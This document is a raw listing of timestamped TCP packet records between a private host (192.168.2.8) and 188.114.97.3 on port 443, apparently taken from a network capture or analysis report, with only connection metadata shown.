                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.227475882 CET44349706188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.227561951 CET49706443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.228092909 CET49706443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.228162050 CET44349706188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.228261948 CET49706443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.261310101 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.261352062 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.261423111 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.265327930 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.265341043 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.871432066 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.871535063 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.875273943 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.875286102 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.875575066 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.924503088 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.971333027 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.163583994 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.195751905 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.195796013 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.195837021 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.195875883 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.195931911 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196036100 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196223021 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196269035 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196278095 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196763992 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196793079 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196810961 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196819067 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.196860075 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.310977936 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311161041 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311196089 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311335087 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311378002 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311481953 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311578989 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311603069 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311949968 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311988115 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.311997890 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312004089 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312042952 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312091112 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312884092 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312921047 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312939882 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312948942 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312984943 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.312990904 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313024998 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313079119 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313086033 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313751936 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313783884 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313798904 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313810110 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313852072 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.313858986 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.357619047 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426388979 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426503897 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426544905 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426590919 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426608086 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426632881 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426646948 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426736116 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426812887 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426820040 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426861048 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426937103 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.426943064 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427087069 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427134991 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427141905 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427182913 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427788019 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427841902 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427862883 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427870035 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427892923 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.427915096 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428647041 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428706884 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428769112 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428821087 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428877115 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.428925037 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429658890 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429717064 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429779053 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429828882 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.429951906 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.430015087 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.430614948 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.430668116 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541659117 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541785955 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541811943 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541862965 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.541981936 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542032957 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542197943 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542243004 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542433977 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542475939 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542484045 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542495966 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542525053 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542556047 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542812109 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542876959 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.542996883 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543046951 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543277025 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543348074 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543548107 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543601990 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543719053 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.543770075 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544007063 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544054031 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544060946 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544080019 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544105053 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544473886 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544523001 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544533968 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544586897 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544625044 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544676065 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544826031 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.544886112 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.545090914 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.545135021 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.545448065 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.545500040 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.545571089 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.545618057 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.598929882 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.656763077 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.656825066 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.656846046 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.656881094 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.656898022 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.656943083 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.657049894 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.657095909 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.659905910 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.659943104 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.659959078 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.659981012 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.659995079 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660240889 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660291910 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660304070 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660341024 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660361052 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660403967 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660697937 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660753012 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660810947 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.660864115 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.661155939 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.661190987 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.661202908 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.661214113 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.661230087 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662036896 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662056923 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662092924 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662107944 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662132025 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662570953 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662616968 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662638903 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662650108 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662672997 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.662684917 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663239002 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663247108 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663302898 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663321972 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663362026 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663861036 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663918018 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.663929939 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.664777994 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.664793968 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.664828062 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.664844036 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.664864063 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.665381908 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.665399075 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.665427923 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.665441036 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.665456057 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666261911 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666276932 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666315079 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666327953 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666342020 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666348934 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666361094 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666399002 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666412115 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666435003 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.666460037 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667218924 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667238951 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667278051 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667292118 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.667337894 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.668324947 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772707939 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772726059 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772840023 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772891045 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772931099 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.772986889 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773003101 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773061037 CET49707443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773073912 CET44349707188.114.97.3192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:17.773113966 CET49707443192.168.2.8188.114.97.3
